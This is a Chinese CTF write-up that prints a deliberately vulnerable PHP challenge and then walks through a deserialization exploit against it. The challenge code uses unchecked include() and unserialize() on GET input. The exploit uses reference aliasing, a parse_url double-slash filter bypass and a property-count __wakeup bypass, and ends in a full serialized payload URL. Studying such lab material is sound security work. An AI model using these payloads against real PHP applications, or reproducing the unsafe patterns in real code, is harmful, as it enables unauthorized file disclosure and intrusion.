index.php的源碼
<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$query);
foreach($query as $value){
if (preg_match("/flag/",$value)) {
die('stop hacking!');
exit();
}
}
$payload = unserialize($payload);
}else{
echo "Missing parameters";
}
?>
hint.php的源碼
<?php
class Handle{
private $handle;
public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
echo "Waking up\n";
}
public function __construct($handle) {
$this->handle = $handle;
}
public function __destruct(){
$this->handle->getFlag();
}
}
class Flag{
public $file="flag.php";
public $token;
public $token_flag;
function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
}
public function getFlag(){
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true);
}
}
}
}
看了writeup,人家將hint.php的代碼複製到本地,然後稍做修改了一下,人家在Flag類裏面的構造函數又多加了一行
$this->token = &$this->token_flag;
使用了引用,這樣下面比較的時候就相等了(人家是真的強QAQ,自己還是太菜了)。
然後序列化一下得到結果。這個時候還不能提交還要稍作修改,要繞過下面代碼
if(isset($payload)){
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$query);
foreach($query as $value){
if (preg_match("/flag/",$value)) {
die('stop hacking!');
exit();
}
}
$_SERVER[‘REQUEST_URI’]是獲得host後面的值,也就是返回.com後面的值。這個時候如何繞過呢,當前面只有一個/的時候會正常解析,當有兩個/的時候就會返回flase,利用這個繞過。
還有一點也要繞過就是Handel類裏面的wakeup函數,這個只需要在序列化後 成員函數的數目改大就可以了。//?file=hint.php&payload=O:6:”Handle”:2:{s:14:”%00Handle%00handle”;O:4:”Flag”:3:{s:4:”file”;s:8:”flag.php”;s:5:”token”;s:32:”b77375f945f272a2084c0119c871c13c”;s:10:”token_flag”;R:4;}}